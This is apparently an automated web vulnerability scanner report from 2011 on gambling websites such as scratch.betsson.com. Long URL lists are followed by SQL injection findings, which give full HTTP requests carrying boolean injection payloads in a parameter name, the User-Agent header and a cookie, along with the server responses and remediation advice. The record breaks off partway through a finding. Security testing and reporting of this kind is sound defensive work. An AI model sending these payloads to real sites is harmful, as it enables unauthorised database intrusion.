22.6. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.7. http://platform.ak.fbcdn.net/www/app_full_proxy.php

22.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

22.9. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

22.10. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/29zADtiP5cm.css

22.11. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/6Lsyu5J6BKV.css

22.12. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/13eVoEevxOb.css

22.13. http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/KI-TuOEwsYB.js

22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png

22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png

22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

22.30. http://www.facebook.com/

22.31. http://www.facebook.com/

22.32. http://www.facebook.com/PrimeScratchCards

22.33. http://www.facebook.com/PrimeScratchCards

22.34. http://www.facebook.com/WinningsCom

22.35. http://www.facebook.com/WinningsCom

22.36. http://www.facebook.com/crazyscratch

22.37. http://www.facebook.com/extern/login_status.php

22.38. http://www.facebook.com/extern/login_status.php

22.39. http://www.facebook.com/pages/BigMoneyScratch/156518521055171

22.40. http://www.facebook.com/pages/PrimeScratchCards/122783514413813

22.41. http://www.facebook.com/peoplespostcodelottery

22.42. http://www.facebook.com/plugins/likebox.php

22.43. http://www.facebook.com/plugins/likebox.php

22.44. https://www.interwetten.com/cs/Default.aspx

22.45. https://www.interwetten.com/de/Default.aspx

22.46. https://www.interwetten.com/el/Default.aspx

22.47. https://www.interwetten.com/en/Default.aspx

22.48. https://www.interwetten.com/en/casino/default.aspx

22.49. https://www.interwetten.com/en/games/default.aspx

22.50. https://www.interwetten.com/en/online-skillgames

22.51. https://www.interwetten.com/en/scratch/default.aspx

22.52. https://www.interwetten.com/en/skill/default.aspx

22.53. https://www.interwetten.com/es/Default.aspx

22.54. https://www.interwetten.com/fr/Default.aspx

22.55. https://www.interwetten.com/it/Default.aspx

22.56. https://www.interwetten.com/pt/Default.aspx

22.57. https://www.interwetten.com/tr/Default.aspx

22.58. http://www.metacafe.com/fplayer/

23. Robots.txt file

23.1. http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6

23.2. http://ad.doubleclick.net/N6707/adj/meta.homepage/adminMsg

23.3. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

23.4. http://b.scorecardresearch.com/b

23.5. https://bingo.betsson.com/en/

23.6. http://blog.crazyscratch.com/

23.7. http://blog.deconcept.com/swfobject/

23.8. http://blog.postcodelottery.com/

23.9. http://blog.primescratchcards.co.uk/

23.10. http://br.winnings.com/

23.11. http://c.betrad.com/a/n/581/1296.js

23.12. http://creativecommons.org/licenses/by-sa/2.5/br/deed.en_US

23.13. http://d.tradex.openx.com/afr.php

23.14. http://d.xp1.ru4.com/um

23.15. http://da.crazyscratch.com/

23.16. http://da.winnings.com/

23.17. http://de.crazyscratch.com/

23.18. http://de.winnings.com/

23.19. http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.20. https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.21. http://download.neogames-tech.com/Brands/MundiRasca/Website/General/BottomMenuBG.jpg

23.22. https://download.neogames-tech.com/chat/chatstart.aspx

23.23. http://el.crazyscratch.com/

23.24. http://el.winnings.com/

23.25. http://en.crazyscratch.com/

23.26. http://es.crazyscratch.com/

23.27. http://es.winnings.com/

23.28. http://feeds.bbci.co.uk/news/rss.xml

23.29. http://fi.crazyscratch.com/

23.30. http://fi.winnings.com/

23.31. http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

23.32. http://fr.crazyscratch.com/

23.33. http://fr.winnings.com/

23.34. http://getclicky.com/66384109

23.35. http://gmpg.org/xfn/11

23.36. http://go.microsoft.com/fwlink/

23.37. http://it.crazyscratch.com/

23.38. http://itunes.apple.com/us/app/pclottery/id399201446

23.39. http://jquery.org/license

23.40. http://leandrovieira.com/projects/jquery/lightbox/

23.41. http://m.xp1.ru4.com/ad

23.42. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

23.43. http://nl.crazyscratch.com/

23.44. http://nl.winnings.com/

23.45. http://no.crazyscratch.com/

23.46. http://no.winnings.com/

23.47. http://pagead2.googlesyndication.com/pagead/imgad

23.48. http://pixel.invitemedia.com/data_sync

23.49. http://pixel.quantserve.com/pixel

23.50. http://pt.crazyscratch.com/

23.51. http://pt.winnings.com/

23.52. http://pubads.g.doubleclick.net/pagead/adview

23.53. http://s.mcstatic.com/Images/Studios/videogame/ChannelLogo.jpg

23.54. http://s0.2mdn.net/879366/flashwrite_1_2.js

23.55. http://s1.mcstatic.com/JS12/Home/

23.56. http://s3.mcstatic.com/thumb/6373642/18140891/4/videos/2/1/the_cleveland_show_karate_season_2.jpg

23.57. http://s4.mcstatic.com/CSS/Global/

23.58. http://s6.mcstatic.com/thumb/6289097/17948388/4/videos/0/1/l_a_noire_gameplay_series_3.jpg

23.59. http://safebrowsing.clients.google.com/safebrowsing/downloads

23.60. http://scratch.co.uk/

23.61. http://spe.atdmt.com/ds/AAAVEWEWAWWA/20110413_WWA_Sp11_X1_NewCreative/WWA_Sp11_X1_Online_Fingertips_300x250.gif

23.62. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.63. http://sv.crazyscratch.com/

23.64. http://sv.winnings.com/

23.65. http://twitter.com/ukscratch

23.66. http://va.px.invitemedia.com/goog_imp

23.67. http://video.google.com/googleplayer.swf

23.68. http://winnings.com/wp-content/plugins/google-analyticator/external-tracking.min.js

23.69. http://winter.metacafe.com/Openx/www/delivery/lg.php

23.70. http://www.adobe.com/go/getflashplayer

23.71. http://www.apple.com/qtactivex/qtplugin.cab

23.72. https://www.aspireaffiliates.com/

23.73. https://www.betsson.com/core/StartPlaying/Scripts/Compiled/StartPlayingApi.js

23.74. http://www.clickandbuy.com/WW_en/payment/index.html

23.75. http://www.crazyscratch.com/

23.76. http://www.facebook.com/WinningsCom

23.77. http://www.gambleaware.co.uk/

23.78. http://www.gamblersanonymous.org.uk/

23.79. http://www.gamcare.org.uk/

23.80. http://www.google-analytics.com/__utm.gif

23.81. http://www.heavenaffiliates.com/

23.82. https://www.interwetten.com/

23.83. http://www.itechlabs.com.au/

23.84. http://www.lga.org.mt/lga/content.aspx

23.85. http://www.metacafe.com/fplayer/

23.86. http://www.national-lottery.co.uk/

23.87. http://www.nedstat.com/terms.html

23.88. https://www.neogamespartners.com/

23.89. http://www.opensource.org/licenses/mit-license.php

23.90. http://www.paysafecard.com/

23.91. http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm

23.92. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

23.93. http://www.thawte.com/

23.94. https://www.thawte.com/

23.95. http://www.trustlogo.com/ttb_searcher/trustlogo

23.96. http://www.tstglobal.com/

23.97. http://www.ukash.com/

23.98. http://www.verisign.co.uk/

23.99. http://www.vincite.net/

23.100. http://www.winnings.com/

23.101. http://www.youtube.com/v/

24. Cacheable HTTPS response

24.1. https://in.getclicky.com/

24.2. https://sealinfo.verisign.com/splash

24.3. https://www.aspireaffiliates.com/

24.4. https://www.aspireaffiliates.com/WebSite/Affiliates/login.aspx

24.5. https://www.aspireaffiliates.com/marketing-samples/

24.6. https://www.aspireaffiliates.com/mobile/

24.7. https://www.betsson.com/en/customer-service/

24.8. https://www.betsson.com/en/customer-service/forgotten-password/

24.9. https://www.betsson.com/en/customer-service/privacy-statement/

24.10. https://www.betsson.com/en/customer-service/responsible-gaming/

24.11. https://www.betsson.com/en/customer-service/terms/index.asp

24.12. https://www.betsson.com/my-account/refer-a-friend/index.asp

24.13. https://www.interwetten.com/en/Default.aspx

24.14. https://www.interwetten.com/en/american-football-betting

24.15. https://www.interwetten.com/en/australian-rules-football-betting

24.16. https://www.interwetten.com/en/beach-soccer-betting

24.17. https://www.interwetten.com/en/boxing-betting

24.18. https://www.interwetten.com/en/casino/default.aspx

24.19. https://www.interwetten.com/en/cycling-betting

24.20. https://www.interwetten.com/en/darts-betting

24.21. https://www.interwetten.com/en/football-betting

24.22. https://www.interwetten.com/en/games/default.aspx

24.23. https://www.interwetten.com/en/golf-betting

24.24. https://www.interwetten.com/en/handball-betting

24.25. https://www.interwetten.com/en/ice-hockey-betting

24.26. https://www.interwetten.com/en/livebets

24.27. https://www.interwetten.com/en/motorbikes-betting

24.28. https://www.interwetten.com/en/online-skillgames

24.29. https://www.interwetten.com/en/politics-betting

24.30. https://www.interwetten.com/en/rugby-betting

24.31. https://www.interwetten.com/en/sailing-betting

24.32. https://www.interwetten.com/en/scratch/default.aspx

24.33. https://www.interwetten.com/en/ski-alpine-betting

24.34. https://www.interwetten.com/en/skill/default.aspx

24.35. https://www.interwetten.com/en/sportsbook/default.aspx

24.36. https://www.interwetten.com/en/tennis-betting

24.37. https://www.interwetten.com/en/volleyball-betting

24.38. https://www.interwetten.com/en/water-polo-betting

24.39. https://www.interwetten.com/en/winter-games-betting

24.40. https://www.norskelodd.com/no/

24.41. https://www.norskelodd.com/no/FAQ

24.42. https://www.norskelodd.com/no/aboutus/

24.43. https://www.norskelodd.com/no/charity/

24.44. https://www.norskelodd.com/no/default.aspx

24.45. https://www.norskelodd.com/no/fair-play/

24.46. https://www.norskelodd.com/no/forgotten-password

24.47. https://www.norskelodd.com/no/play/3Wow

24.48. https://www.norskelodd.com/no/play/7thHeaven

24.49. https://www.norskelodd.com/no/play/GonzosQuest

24.50. https://www.norskelodd.com/no/promotions/

24.51. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

24.52. https://www.thawte.com/

25. HTML does not specify charset

25.1. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

25.2. http://d.xp1.ru4.com/um

25.3. http://download.neogames-tech.com/

25.4. http://f.nexac.com/favicon.ico

25.5. http://in.getclicky.com/

25.6. https://in.getclicky.com/

25.7. http://members.bet365.com/site.asp

25.8. http://neogames-tech.com/outbound/article/www.lga.org.mt

25.9. http://pixel.invitemedia.com/data_sync

25.10. http://trk.primescratchcards.com/

25.11. http://www.gamblersanonymous.org/

25.12. http://www.maestrocard.com/

25.13. http://www.mastercard.com/uk/gateway.html

25.14. http://www.neogames.com/outbound/article/crazyscratch.com

25.15. http://www.neogames.com/outbound/article/karamba.com

25.16. http://www.neogames.com/outbound/article/mundirasca.com

25.17. http://www.neogames.com/outbound/article/norgesloddet.com

25.18. http://www.neogames.com/outbound/article/scratch.betsson.com

25.19. http://www.neogames.com/outbound/article/www.crazyscratch.com

25.20. http://www.neogames.com/outbound/article/www.interwetten.com

25.21. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

25.22. http://www.neogames.com/outbound/article/www.winnings.com

25.23. http://www.primescratchcards.com/track/

25.24. http://www.verisign.co.uk/

25.25. http://www.winnings.com/wp-admin/admin-ajax.php

26. Content type incorrectly stated

26.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

26.2. http://in.getclicky.com/

26.3. https://in.getclicky.com/

26.4. http://neogames-tech.com/outbound/article/www.lga.org.mt

26.5. http://rtb50.doubleverify.com/rtb.ashx/verifyc

26.6. https://secure.neogames-tech.com/ScratchCards/images/seal_background.png

26.7. http://server.iad.liveperson.net/hcp/html/mTag.js

26.8. http://trk.primescratchcards.com/w3c/p3p.xml

26.9. http://www.neogames.com/outbound/article/crazyscratch.com

26.10. http://www.neogames.com/outbound/article/karamba.com

26.11. http://www.neogames.com/outbound/article/mundirasca.com

26.12. http://www.neogames.com/outbound/article/norgesloddet.com

26.13. http://www.neogames.com/outbound/article/scratch.betsson.com

26.14. http://www.neogames.com/outbound/article/www.crazyscratch.com

26.15. http://www.neogames.com/outbound/article/www.interwetten.com

26.16. http://www.neogames.com/outbound/article/www.postcodelottery.co.uk

26.17. http://www.neogames.com/outbound/article/www.winnings.com

26.18. http://www.winnings.com/wp-admin/admin-ajax.php

27. Content type is not specified



1. SQL injection
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. https://scratch.betsson.com/en/Casino/Disco-Keno [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Casino/Disco-Keno

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Casino/Disco-Keno?1%20and%201%3d1--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/Golden-Fortune">Try Golden Fortune now... the maximum Jackpot is 200,000 GBP!</a> </span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" oncli
...[SNIP]...

Request 2

GET /en/Casino/Disco-Keno?1%20and%201%3d2--%20=1 HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:10 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:10 GMT
Connection: close
Content-Length: 102694


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Sports/Goal-Kick">Calling all football fans...Goal Kick - ..200,000 Jackpot!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Casino" />
<meta name="WT.cg_s" content="Startpage_Casino" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="inactiveViewBtnOuter" onclick="ToggleGameView('fantasy','Casino');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="activeViewBtnOuter" onclick="Toggle
...[SNIP]...

1.2. https://scratch.betsson.com/en/Fantasy/The-Lost-Maya [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Fantasy/The-Lost-Maya

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d1--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:44 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102708


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" oncl
...[SNIP]...

Request 2

GET /en/Fantasy/The-Lost-Maya HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'%20and%201%3d2--%20
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:45 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:44 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<a href="https://scratch.betsson909.com/en/Casino/Slot-Super-7">Try our classic Slot Scratch card, Super 7 now!</a></span>
</div>
<div class="divLeftMenuPromoItemBottom"></div>
</div>
<div class="divMiddleContent" id="divMiddleContent" >
<div id="active_main_promo">
<div class="divMainPromo" id="divMainPromo"></div>
</div>
<div id="divMain" class="divMain">

<meta name="WT.ti" content="Scratch/Startpage_Fantasy" />
<meta name="WT.cg_s" content="Startpage_Fantasy" />

<!-- Meta data for AB-testing, remove when tests id done -->




<div class="gamesView">
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_all" class="inactiveViewBtnOuter" onclick="ToggleGameView('all','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_allText" class="inactiveViewBtnInner">View All</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopular" class="inactiveViewBtnOuter" onclick="ToggleGameView('mostpopular','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_mostpopularText" class="inactiveViewBtnInner">Most Popular</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_classic" class="inactiveViewBtnOuter" onclick="ToggleGameView('classic','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_classicText" class="inactiveViewBtnInner">Classic Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_sports" class="inactiveViewBtnOuter" onclick="ToggleGameView('sports','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_sportsText" class="inactiveViewBtnInner">Sports Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasy" class="activeViewBtnOuter" onclick="ToggleGameView('fantasy','Fantasy');"><div id="ctl00_ctl00_cphMain_cphMain_ctl01_fantasyText" class="inactiveViewBtnInner">Fantasy Scratch</div></div>
<div id="ctl00_ctl00_cphMain_cphMain_ctl01_casino" class="inactiveViewBtnOuter" onclick="ToggleGa
...[SNIP]...

1.3. https://scratch.betsson.com/en/Slots/Fantasia [site cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fantasia

Issue detail

The site cookie appears to be vulnerable to SQL injection attacks. The payloads 52785076'%20or%201%3d1--%20 and 52785076'%20or%201%3d2--%20 were each submitted in the site cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en52785076'%20or%201%3d1--%20; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:03 GMT; path=/
